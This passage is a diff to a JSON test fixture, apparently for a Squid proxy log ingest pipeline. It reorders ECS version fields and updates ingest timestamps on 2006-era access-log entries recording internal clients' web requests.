[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689344.736 4969 10.105.47.218 TCP_MISS/200 29359 GET http://hi5.com/ nazsoau DIRECT/204.13.51.238 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662158Z" + "ingested": "2021-12-14T14:55:08.315639739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689344.798 1631 10.105.47.218 TCP_MISS/200 5930 GET http://hi5.com/friend/styles/homepage.css nazsoau DIRECT/204.13.51.238 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662162200Z" + "ingested": "2021-12-14T14:55:08.315640072Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689345.641 1810 10.105.33.214 TCP_MISS/200 1645 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662166900Z" + "ingested": "2021-12-14T14:55:08.315640407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689346.267 880 10.105.37.58 TCP_DENIED/407 1812 GET http://rms.adobe.com/read/0600/win_/ENU/read0600win_ENUadbe0000.xml - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662171100Z" + "ingested": "2021-12-14T14:55:08.315640735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.190 10 10.105.47.218 TCP_IMS_HIT/304 217 GET http://images.hi5.com/styles/style.css nazsoau NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.662176200Z" + "ingested": "2021-12-14T14:55:08.315641085Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.307 116 10.105.47.218 TCP_IMS_HIT/304 217 GET 
http://images.hi5.com/friend/styles/buttons_en_us.css nazsoau NONE/- text/css", "event": { - "ingested": "2021-06-08T12:14:41.662212500Z" + "ingested": "2021-12-14T14:55:08.315641412Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689347.751 6160 10.105.47.218 TCP_MISS/200 27799 GET http://hi5.com/ nazsoau DIRECT/204.13.51.238 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662219100Z" + "ingested": "2021-12-14T14:55:08.315641750Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689349.064 1758 10.105.47.218 TCP_MISS/200 4470 GET http://hi5.com/friend/styles/headernav.css nazsoau DIRECT/204.13.51.238 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662224300Z" + "ingested": "2021-12-14T14:55:08.315642097Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689350.829 1393 10.105.33.214 TCP_MISS/200 382 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662230200Z" + "ingested": "2021-12-14T14:55:08.315642434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689353.439 3667 10.105.33.214 TCP_MISS/200 24095 GET http://insider.msg.yahoo.com/? 
adeolaegbedokun DIRECT/68.142.194.14 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662235100Z" + "ingested": "2021-12-14T14:55:08.315642872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689353.939 4899 10.105.33.214 TCP_MISS/200 22964 GET http://radio.launch.yahoo.com/radio/play/playmessenger.asp adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662239500Z" + "ingested": "2021-12-14T14:55:08.315643207Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689354.877 1349 10.105.33.214 TCP_MISS/200 646 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662245700Z" + "ingested": "2021-12-14T14:55:08.315643543Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689355.517 1578 10.105.33.214 TCP_MISS/200 699 GET http://address.yahoo.com/yab/us? adeolaegbedokun DIRECT/209.191.93.51 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662249600Z" + "ingested": "2021-12-14T14:55:08.315643935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689356.907 6741 10.105.21.199 TCP_MISS/302 734 GET http://fxfeeds.mozilla.org/rss20.xml badeyek DIRECT/63.245.209.21 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662253500Z" + "ingested": "2021-12-14T14:55:08.315644270Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689357.267 6424 10.105.33.214 TCP_MISS/200 31400 GET http://insider.msg.yahoo.com/ycontent/? 
adeolaegbedokun DIRECT/68.142.231.252 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662257700Z" + "ingested": "2021-12-14T14:55:08.315644668Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689357.720 2831 10.105.33.214 TCP_MISS/200 21152 GET http://insider.msg.yahoo.com/ycontent/? adeolaegbedokun DIRECT/68.142.194.14 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662261400Z" + "ingested": "2021-12-14T14:55:08.315645009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.173 1 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662265300Z" + "ingested": "2021-12-14T14:55:08.315645345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.174 0 10.105.37.17 TCP_DENIED/407 1767 POST http://us.mcafee.com/apps/agent/submgr/appinstru.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662269200Z" + "ingested": "2021-12-14T14:55:08.315645678Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.174 0 10.105.37.17 TCP_DENIED/407 1761 POST http://us.mcafee.com/apps/agent/submgr/appsync.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662273Z" + "ingested": "2021-12-14T14:55:08.315646009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.226 0 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662276800Z" + "ingested": "2021-12-14T14:55:08.315646351Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.486 711 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_stations.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662281100Z" + "ingested": "2021-12-14T14:55:08.315646679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689358.683 0 10.105.37.17 TCP_DENIED/407 1667 CONNECT us.mcafee.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662284800Z" + "ingested": "2021-12-14T14:55:08.315647017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.199 713 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_stations_over.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662288200Z" + "ingested": "2021-12-14T14:55:08.315647352Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.269 1982 10.105.33.214 TCP_MISS/200 362 POST http://shttp.msg.yahoo.com/notify/ adeolaegbedokun DIRECT/216.155.194.239 text/plain", "event": { - "ingested": "2021-06-08T12:14:41.662291800Z" + "ingested": "2021-12-14T14:55:08.315647690Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689359.924 725 10.105.33.214 TCP_REFRESH_HIT/304 511 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_left.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662295300Z" + "ingested": "2021-12-14T14:55:08.315648022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689360.611 687 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/launchcast_radio.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662299100Z" + "ingested": "2021-12-14T14:55:08.315648455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689360.980 1 10.105.47.191 TCP_DENIED/407 1767 POST http://us.mcafee.com/apps/agent/submgr/appinstru.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662303Z" + "ingested": "2021-12-14T14:55:08.315648788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.188 1 10.105.47.191 TCP_DENIED/407 1761 POST http://us.mcafee.com/apps/agent/submgr/appsync.asp - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662306500Z" + "ingested": "2021-12-14T14:55:08.315649133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.393 783 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_right.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662310300Z" + "ingested": "2021-12-14T14:55:08.315649468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689361.564 2242 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_center.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662313800Z" + "ingested": "2021-12-14T14:55:08.315649802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.220 827 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_controls_off.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662317400Z" + "ingested": "2021-12-14T14:55:08.315650133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.315 751 10.105.33.214 TCP_REFRESH_HIT/304 512 GET http://radio.launch.yahoo.com/radio/common_radio/resources/images/t.gif adeolaegbedokun DIRECT/68.142.219.132 -", "event": { - "ingested": "2021-06-08T12:14:41.662321Z" + "ingested": "2021-12-14T14:55:08.315650465Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.318 3 10.105.33.214 TCP_IMS_HIT/304 218 GET http://radio.launch.yahoo.com/radio/clientdata/538/images/btn_off_state_station.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662324600Z" + "ingested": "2021-12-14T14:55:08.315650791Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.332 13 10.105.33.214 TCP_IMS_HIT/304 218 GET http://radio.launch.yahoo.com/radio/clientdata/538/skins/1/images/bg_controls_fill.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662328100Z" + "ingested": "2021-12-14T14:55:08.315651124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689362.341 8 10.105.33.214 TCP_HIT/200 2263 GET http://us.i1.yimg.com/us.yimg.com/i/us/toolbar50x50.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662331600Z" + "ingested": "2021-12-14T14:55:08.315651459Z" 
+ }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689363.423 6517 10.105.21.199 TCP_REFRESH_MISS/200 17396 GET http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml badeyek DIRECT/212.58.226.33 application/xml", "event": { - "ingested": "2021-06-08T12:14:41.662335100Z" + "ingested": "2021-12-14T14:55:08.315651791Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.361 2140 10.105.33.214 TCP_MISS/200 407 GET http://insider.msg.yahoo.com/ycontent/beacon.php adeolaegbedokun DIRECT/68.142.231.252 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662338700Z" + "ingested": "2021-12-14T14:55:08.315652122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.402 7 10.105.33.214 TCP_IMS_HIT/304 219 GET http://us.ent1.yimg.com/images.launch.yahoo.com/000/032/457/32457654.jpg adeolaegbedokun NONE/- image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662342700Z" + "ingested": "2021-12-14T14:55:08.315652464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689364.411 8 10.105.33.214 TCP_HIT/200 10593 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060906/thumb.71d29ded334347c48ac88433d033c9a9.pakistan_bin_laden_nyol440.jpg adeolaegbedokun NONE/- image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662346200Z" + "ingested": "2021-12-14T14:55:08.315652797Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689365.312 2420 10.105.33.214 TCP_MISS/302 1270 POST http://radio.launch.yahoo.com/radio/play/authplay.asp adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": 
"2021-06-08T12:14:41.662349800Z" + "ingested": "2021-12-14T14:55:08.315653135Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689366.377 1966 10.105.33.214 TCP_MISS/200 10519 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060908/thumb.443f57762d7349669f609fbf0c97a5f1.academy_awards_host_cacp101.jpg adeolaegbedokun DIRECT/213.160.98.159 image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662353400Z" + "ingested": "2021-12-14T14:55:08.315653482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.080 1703 10.105.33.214 TCP_MISS/200 515 GET http://radio.music.yahoo.com/radio/player/ymsgr/initstationfeed.asp? adeolaegbedokun DIRECT/68.142.219.132 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662357Z" + "ingested": "2021-12-14T14:55:08.315653815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.370 3057 10.105.33.214 TCP_MISS/200 14411 GET http://radio.music.yahoo.com/radio/player/ymsgr/initstationfeed.asp? adeolaegbedokun DIRECT/68.142.219.132 text/xml", "event": { - "ingested": "2021-06-08T12:14:41.662360600Z" + "ingested": "2021-12-14T14:55:08.315654149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689368.889 808 10.105.33.214 TCP_MISS/200 1627 GET http://radio.launch.yahoo.com/radio/play/authplay.asp? 
adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662364100Z" + "ingested": "2021-12-14T14:55:08.315654482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689369.097 1226 10.105.37.65 TCP_DENIED/407 1728 GET http://natrocket.kmip.net:5288/iesocks? - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662367700Z" + "ingested": "2021-12-14T14:55:08.315654819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689369.702 0 10.105.37.65 TCP_DENIED/407 1725 GET http://natrocket.kmip.net:5288/return? - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662371400Z" + "ingested": "2021-12-14T14:55:08.315655148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689370.125 1202 10.105.33.214 TCP_MISS/200 13124 GET http://us.news1.yimg.com/us.yimg.com/p/ap/20060907/thumb.1caf18e56db54eafb16da58356eb3382.amazon_com_online_video_watw101.jpg adeolaegbedokun DIRECT/213.160.98.159 image/jpeg", "event": { - "ingested": "2021-06-08T12:14:41.662375200Z" + "ingested": "2021-12-14T14:55:08.315655493Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689370.862 736 10.105.33.214 TCP_MISS/302 912 GET http://radio.launch.yahoo.com/radio/clientdata/515/starter.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662378600Z" + "ingested": "2021-12-14T14:55:08.315655817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689371.690 828 10.105.33.214 TCP_MISS/200 1450 GET http://radio.launch.yahoo.com/radio/player/default.asp? 
adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662382200Z" + "ingested": "2021-12-14T14:55:08.315656154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689371.987 3617 10.105.33.214 TCP_MISS/200 30432 GET http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/081106_lrec_msgr_interophitchhiker.swf? adeolaegbedokun DIRECT/213.160.98.152 application/x-shockwave-flash", "event": { - "ingested": "2021-06-08T12:14:41.662386500Z" + "ingested": "2021-12-14T14:55:08.315656601Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689373.315 1626 10.105.33.214 TCP_MISS/200 14643 GET http://radio.launch.yahoo.com/radio/player/stickwall.asp? adeolaegbedokun DIRECT/68.142.219.132 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662390200Z" + "ingested": "2021-12-14T14:55:08.315656930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689374.065 2078 10.105.33.214 TCP_MISS/200 425 GET http://us.bc.yahoo.com/b? adeolaegbedokun DIRECT/68.142.213.132 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662393800Z" + "ingested": "2021-12-14T14:55:08.315657259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689376.221 2130 10.105.33.214 TCP_MISS/200 407 GET http://insider.msg.yahoo.com/ycontent/beacon.php;_ylc=X1MDNTcwMzAyODMEX3IDMgRldnQDdDAEaW50bAN1cwR2ZXIDNywwLDIsMTIw? 
adeolaegbedokun DIRECT/68.142.194.14 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662397600Z" + "ingested": "2021-12-14T14:55:08.315657593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.171 3412 10.105.33.214 TCP_MISS/200 1476 CONNECT pclick.internal.yahoo.com:443 adeolaegbedokun DIRECT/216.109.124.55 -", "event": { - "ingested": "2021-06-08T12:14:41.662401100Z" + "ingested": "2021-12-14T14:55:08.315657928Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.191 11 10.105.33.214 TCP_IMS_HIT/304 233 GET http://a1568.g.akamai.net/7/1568/1600/20051025184124/radio.launch.yahoo.com/radioapi/includes/js/compVersionedJS/rapiBridge_1_4.js adeolaegbedokun NONE/- application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662404700Z" + "ingested": "2021-12-14T14:55:08.315658259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689377.424 1159 10.105.33.214 TCP_MISS/304 236 GET http://a1568.g.akamai.net/7/1568/1600/20040405222754/radio.launch.yahoo.com/radio/clientdata/515/other.css adeolaegbedokun DIRECT/213.160.98.159 text/css", "event": { - "ingested": "2021-06-08T12:14:41.662437100Z" + "ingested": "2021-12-14T14:55:08.315658579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.221 797 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_left.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662443100Z" + "ingested": "2021-12-14T14:55:08.315658921Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, 
{ - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.473 3288 10.105.21.199 TCP_MISS/200 2681 CONNECT login.yahoo.com:443 badeyek DIRECT/209.73.177.115 -", "event": { - "ingested": "2021-06-08T12:14:41.662447400Z" + "ingested": "2021-12-14T14:55:08.315659255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.909 1405 10.105.33.214 TCP_MISS/304 136 GET http://a1568.g.akamai.net/7/1568/1600/20050829181418/radio.launch.yahoo.com/radio/common_radio/resources/images/noaccess_msgr_uk.gif adeolaegbedokun DIRECT/213.160.98.167 -", "event": { - "ingested": "2021-06-08T12:14:41.662452Z" + "ingested": "2021-12-14T14:55:08.315659597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.924 702 10.105.33.214 TCP_MISS/304 237 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_right.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662456Z" + "ingested": "2021-12-14T14:55:08.315659923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689378.929 4 10.105.33.214 TCP_IMS_HIT/304 218 GET http://a1568.g.akamai.net/7/1568/1600/20040405222807/radio.launch.yahoo.com/radio/common_radio/resources/images/t.gif adeolaegbedokun NONE/- image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662471500Z" + "ingested": "2021-12-14T14:55:08.315660252Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689379.472 563 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_controls_off.gif adeolaegbedokun 
DIRECT/213.160.98.167 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662478700Z" + "ingested": "2021-12-14T14:55:08.315660578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689379.488 560 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222756/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_center.gif adeolaegbedokun DIRECT/213.160.98.159 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662486300Z" + "ingested": "2021-12-14T14:55:08.315660904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689380.159 685 10.105.33.214 TCP_MISS/304 238 GET http://a1568.g.akamai.net/7/1568/1600/20040405222757/radio.launch.yahoo.com/radio/clientdata/515/skins/1/images/bg_controls_fill.gif adeolaegbedokun DIRECT/213.160.98.167 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662490800Z" + "ingested": "2021-12-14T14:55:08.315661239Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.267 1 10.105.37.180 TCP_DENIED/407 1728 GET http://www.google.com/supported_domains - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662494500Z" + "ingested": "2021-12-14T14:55:08.315661567Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.659 0 10.105.47.191 TCP_DENIED/407 1782 GET http://us.mcafee.com/apps/agent/en-us/agent5/chknews.asp? 
- NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662498200Z" + "ingested": "2021-12-14T14:55:08.315661894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689381.660 2171 10.105.33.214 TCP_MISS/200 449 GET http://launch.adserver.yahoo.com/l? adeolaegbedokun DIRECT/216.109.125.112 image/gif", "event": { - "ingested": "2021-06-08T12:14:41.662501800Z" + "ingested": "2021-12-14T14:55:08.315662225Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689382.173 3700 10.105.21.199 TCP_MISS/200 11746 GET http://uk.f250.mail.yahoo.com/dc/launch? badeyek DIRECT/217.12.10.96 text/html", "event": { - "ingested": "2021-06-08T12:14:41.662505500Z" + "ingested": "2021-12-14T14:55:08.315662567Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689382.622 1 10.105.37.180 TCP_DENIED/407 1670 CONNECT login.live.com:443 - NONE/- text/html", "event": { - "ingested": "2021-06-08T12:14:41.662509Z" + "ingested": "2021-12-14T14:55:08.315662900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "1157689384.316 2828 10.105.21.199 TCP_SWAPFAIL_MISS/200 633 GET http://us.js2.yimg.com/us.js.yimg.com/lib/pim/r/dclient/d/js/uk/77cf3e56414f974dfd8616f56f0f632c_1.js badeyek DIRECT/213.160.98.169 application/x-javascript", "event": { - "ingested": "2021-06-08T12:14:41.662512400Z" + "ingested": 